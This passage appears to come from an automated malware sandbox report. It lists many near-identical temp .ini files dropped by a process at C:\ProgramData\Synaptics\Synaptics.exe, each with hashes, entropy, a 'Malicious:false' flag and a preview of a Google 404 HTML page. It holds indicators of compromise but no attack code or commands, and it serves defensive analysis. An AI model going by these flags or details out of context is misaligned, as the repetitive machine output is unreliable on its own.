                                                                                                                                                                                        SSDEEP:24:bsF+0wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+r+pAZewRDK4mW
                                                                                                                                                                                        MD5:4501F5FABB7B47B11D7892F1697F875C
                                                                                                                                                                                        SHA1:7C2E7EE9CF07C720572990D54780353439098D0A
                                                                                                                                                                                        SHA-256:B6FBE878DF7E762C68CE29AB997734174D37B07748C684629B1CC3AB623135A7
                                                                                                                                                                                        SHA-512:2CF6D68A8C28EF6EB9C87A00564F5027E39C6E28D5650A7CC5535343C365C3F4EB6FDC0EF2F3DFE0C5F6C1D5B339BD43068F7374E18AFC1296057D427003148D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cYv7O62mGmJd6ekPZoNXNw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EFbWg6r.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.256297213581737
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0p6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+m6+pAZewRDK4mW
                                                                                                                                                                                        MD5:8D4433CA9953576DF7595C41F773D27F
                                                                                                                                                                                        SHA1:E71825B361167ED92491B5FC3C54B75F29E93500
                                                                                                                                                                                        SHA-256:C156D49BDB1F4AD082BF2B3C3876C90E86D908F4F91905603B48C06E8B8E4586
                                                                                                                                                                                        SHA-512:15FBE1FBAEAFC1ED3527740FA7156FD8DBDCDADC90F69B0B168DC63EDC01A7CC85973D0F0873CC90712038E2314C44FB76BAE86C950C0715CBE0AD440E7B7CA8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LfxE5f4cR7NrSo4YzIlbdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EZjnU5x.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.261247051358032
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+d+pAZewRDK4mW
                                                                                                                                                                                        MD5:B7D220661202217E1AE5D528DEF3B4F0
                                                                                                                                                                                        SHA1:EA85B657A951ECE098F3CE50D166598B51BDCAC1
                                                                                                                                                                                        SHA-256:B514DF09CEDD7437250D07E392CAC95161682135212375405980B095EAE057DE
                                                                                                                                                                                        SHA-512:BF7916D626036DA79B9ADC0B0B1D06962DC746812E62194B4E23038FEA6CF7E7DD8058A00F413B7D184276C00061396F4AA81835907C7F2F6CB3E7CF653FF00E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QwhuCnaQJWRag7eLMY4Q6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EfjmNq9.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.261429689471224
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0a3zDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+pzD+pAZewRDK4mW
                                                                                                                                                                                        MD5:A13B57559D665BADBF382C4124362318
                                                                                                                                                                                        SHA1:A968D6C53C1C4511836505E69F9E7B90D97FD44B
                                                                                                                                                                                        SHA-256:8C5388D8D4D9354DCBA785D0EEF3EE851A52D6E9C854DBA9CA046B94D0F7B6A0
                                                                                                                                                                                        SHA-512:6100A21B20A009C88803D735F334C560281851942DA63911BCDD0F8BD258C8A7A453B49C5DA38E5AAF2632AD13A95B16E8BEE70BE318110BC1CE30A8E40EC8E0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZhVbJn/xnbyw81IzID9WpA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EhEhf1O.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.261275698088889
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0BgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+ig+pAZewRDK4mW
                                                                                                                                                                                        MD5:1BE367F92538F0981293437CCED3857D
                                                                                                                                                                                        SHA1:23264FE1B04588F7E70ACBE8D006D4B462832BC8
                                                                                                                                                                                        SHA-256:DC47DB26604529C8714FF6B8325B43A6206E50ADA9020F1950FA23497A17B238
                                                                                                                                                                                        SHA-512:A3FF45BC02841730358FF2F530D38B4633A0D210B4AEACA688A4C82AA3329921B82EE5DF4D2BE1118652CABB08FF78579E981FA087E0BF0D07527D80B200A68F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aSshr1kzkL3kQYYdCd+QXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EyuLAoA.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.250572226960871
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0dl7XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+YZX+pAZewRDK4mW
                                                                                                                                                                                        MD5:0E57C88FFBCF98C2FDEB026D34806268
                                                                                                                                                                                        SHA1:736E150545A505389D13E9E7D8515970581B32E6
                                                                                                                                                                                        SHA-256:8C1E6D0875C4ABC3BAA4F377A827CB0E2A27CE22D338D257274E0FD2FCEF5697
                                                                                                                                                                                        SHA-512:A0744117AD283E93629CE50488A27B21A2F32B8DB7AA196C93A28AADDA6C401FECC8BF342D7341DDF86BD6AB87A9918C87806B4568B9F4E9194348A88FA8B49B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y84/lmAF3opRDYkTzb0adg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\F3Adjlp.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.254346183235662
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0MbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+lb+pAZewRDK4mW
                                                                                                                                                                                        MD5:17C813D13E46D4884A6B26F600B758DA
                                                                                                                                                                                        SHA1:E697815BBEF4116ED0397669AC13080F24EB9D8D
                                                                                                                                                                                        SHA-256:231928F8E7288A3E9B4951041ACEB5A250E0644B2A50ADBF67102C1116DC27B6
                                                                                                                                                                                        SHA-512:A21DE472B5A80B020025B437CF3216AD2F354CC58B3D2DF3DD7BCF457501EA119A38A8B394BBE1EA1B20C74576D1864F86921CC13539538C6472C76E7B6662B3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eThPREdFs3HD6E0lteccBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\FE9nwP3.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259539826560893
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0vftSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Sft+pAZewRDK4mW
                                                                                                                                                                                        MD5:6A6391D34A27DA82D80539F3DBBFEF89
                                                                                                                                                                                        SHA1:E605F3C4A52D850F7BF26D523A5E36320ADF6644
                                                                                                                                                                                        SHA-256:26A70E750F45911FB87404CFA9A6018E24985191F2FF9BE5F39C1F1BDE06A9A2
                                                                                                                                                                                        SHA-512:6A34DB7F469D18130973EAA735AA91254B2628DA990EA0E5E621E2398ED8C01E53E17966DFB420D660883D6DE528AC3D2B1D75E6393E4EA2A0A27CBA81840EF9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xuCRxL/K04Hkpah5R6ZbvA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\FW3IPAD.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258212522119195
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                        MD5:039647C0CC1A49659E649F0859D85BB7
                                                                                                                                                                                        SHA1:227BFC6777B790D7756EC733E426F0B575E2B4CC
                                                                                                                                                                                        SHA-256:8AD9BB92B1730D5C581DC51FEC383B9ECB1851D9022B79A3CD64827CFF5E985A
                                                                                                                                                                                        SHA-512:8C66AE51522E2EF9DC463A4603E6A2AC91A4734946AF7E03464C155925A18A11E52AF4CAD930274840D203522FDCF35A7238AA68BCB24B7A3FFAE061F875A11E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="126ZaUmMjmWxr1AysTauMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Fi2incy.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.253878162857388
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0cjSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+3+pAZewRDK4mW
                                                                                                                                                                                        MD5:EFB46CFA493B33B10BE2BC9789EB2491
                                                                                                                                                                                        SHA1:E459C9B0A98DA95EA28C2DFB2E0E5AF6E5D5A384
                                                                                                                                                                                        SHA-256:67CEA624F7302964B89073FDC1A7EC71280EC05990C03F130F4D42F82D02C71E
                                                                                                                                                                                        SHA-512:E45F0ED8091A034DF833D494C5ACEBC01F1D93E2D2B43DF49EEC56DC4D6EC16C32EC95CA329F7F7C408C1A11D95638D627B72E52964B6389B32C5249661095FD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KqCpoEo2o6u3b8ixsK6Njg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\FwVkQf7.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.272556674682002
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0FQNDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+aID+pAZewRDK4mW
                                                                                                                                                                                        MD5:BF9B80CC82F397AAD40E3FC5FAD28223
                                                                                                                                                                                        SHA1:7ACE712C527C4B1FA49403BD507B7D1575764CF7
                                                                                                                                                                                        SHA-256:C55BE7750C6BA408110CC709CECDF2E8AD9F93EFBE777D110998056D099E2738
                                                                                                                                                                                        SHA-512:A811C9F4C0C62C6C31C074F46A0110DE10A93E917BF57B8420D29F6231A73B66092B4EEE6D07608E3D3C6EEB74E41F97BC41E86033D5C9284CF2E938F91866B6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LRByDqNFf7HCpbRzZuuL0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\G3UDRDd.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258347556091012
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+a+pAZewRDK4mW
                                                                                                                                                                                        MD5:5CDD6B0734905C29F5462659DB5DEAB1
                                                                                                                                                                                        SHA1:E6399B1D5E1EDDEBBFEC93E1A518F3BF20A133BA
                                                                                                                                                                                        SHA-256:566B858098F5DEF79DEDD14CB3EF96DB2DC4C4D4A10367F59039550DBB56144A
                                                                                                                                                                                        SHA-512:4871F68BAE0726430E19728E89BAEBCDA926DE93EF7CDFCCDB8A54DAAB200AB8724B2F2E4E9A082E4A2CF7E83E7F9ACA0B19E0B63A391868851A02E6A2C00D01
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iX1sej0GLaQg0398JLSOmg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\G7kDGXL.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265787612997787
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0EEVSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+NEV+pAZewRDK4mW
                                                                                                                                                                                        MD5:52E2AE8EF0297AD0531D5D194E8E0425
                                                                                                                                                                                        SHA1:2B1D7388C08E3E79086FC3060593A10F3632C94B
                                                                                                                                                                                        SHA-256:80CB3A17FFB46EFCB7F333B43FE9AFDFA4CE99BCD46ECBA91324752B0D4F4F78
                                                                                                                                                                                        SHA-512:7D5D5EB49F57F694F6B86BE76D8444DE9545C9CC91EA9FF69BDADAE7DDE00672C9CA01E374C6034E2057A9BD43427B1DF087F1632ABB28CBB819C14031C592DD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VwMeIu8kcfjRJFnB1/DQIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\GXFW9JM.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2621543220012805
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0Rn3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+23+pAZewRDK4mW
                                                                                                                                                                                        MD5:78CCC0ACB040EABFDC7194F98DD0D3DD
                                                                                                                                                                                        SHA1:7AFBE9578626289E4D0CBCEA14A14B3F8CA01226
                                                                                                                                                                                        SHA-256:CEB60EA68CF06C7DA5A8FE154181EC3406738E4DB0EFF8253EEADEDFD315741D
                                                                                                                                                                                        SHA-512:C354EBD37BC2B8133ED3EC153478E16DC00AFDC1A46E5120F71527E537223A2EB77FBD7A296C536538AC7227C667D190AA57329FA26EAF8ECC6D57585BD0538A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jvvQ1BXeBwnSFxdC3xqdMg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\GbGQbhJ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
